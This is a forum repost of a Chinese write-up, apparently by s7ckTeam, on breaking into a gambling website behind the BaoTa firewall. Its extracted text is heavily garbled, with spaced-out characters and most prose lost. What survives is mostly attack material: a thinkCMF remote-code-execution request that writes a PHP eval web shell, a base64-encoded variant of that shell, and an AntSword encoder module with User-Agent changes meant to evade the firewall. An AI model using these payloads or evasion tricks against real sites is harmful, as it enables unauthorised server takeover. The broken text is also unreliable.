搜索

[18320] 2021-03-26_实战记一次绕过宝塔防火墙的BC站渗透

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-03-26_实战记一次绕过宝塔防火墙的BC站渗透 | B C p u r e q h   H A C K   2 0 2 1 - 0 3 - 2 6 0 x 0 0   w a f           u r l a d m i n     t h i n k C M F 0 x 0 1   g e t s h e l l t h i n k c m f R C E   ? a = f e t c h & t e m p l a t e F i l e = p u b l i c / i n d e x & p r e f i x = ' ' & c o n t e n t = < p h p > f i l e _ p u t _ c o n t e n t s ( ' t e s t 1 . p h p ' , ' < ? p h p   @ e v a l ( $ _ P O S T [ z e r o ] ) ? > ' ) < / p h p >
  访     s h e l l   p h p i n f o
0 x 0 2   p a y l o a d p a y l o a d   B a s e 6 4 B a s e 6 4 b a s e 6 4 < ? p h p   @ e v a l ( b a s e 6 4 _ d e c o d e ( $ _ P O S T [ z e r o ] ) ) ; ? > p h p i n f o ( ) ; b a s e 6 4   c G h w a W 5 m b y g p O w = =
    0 x 0 3   B a s e 6 4 B a s e 6 4   使 B a s e 6 4
b u r p   w a f U s e r - A g e n t a n t S w o r d / v 2 . 1   w a f     c m d   e v a l   b a s e 6 4 _ d e c o d e   B a s e 6 4 w a f   使 w a f P H P
p a y l o a d B a s e 6 4     ' u s e   s t r i c t ' ; / * *   @ p a r a m     { S t r i n g }   p w d       *   @ p a r a m     { A r r a y }     d a t a       p a y l o a d   *   @ r e t u r n   { A r r a y }     d a t a       p a y l o a d   * / m o d u l e . e x p o r t s   =   ( p w d ,   d a t a ,   e x t = { } )   = >   {     d a t a [ p w d ]   =   B u f f e r . f r o m ( d a t a [ ' _ ' ] ) . t o S t r i n g ( ' b a s e 6 4 ' ) ;     d e l e t e   d a t a [ ' _ ' ] ;     r e t u r n   d a t a ; } U A d a t a [ ' _ ' ] B a s e 6 4
      M u l t i p a r t
              g e t   p h p
      p u r e q h |

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理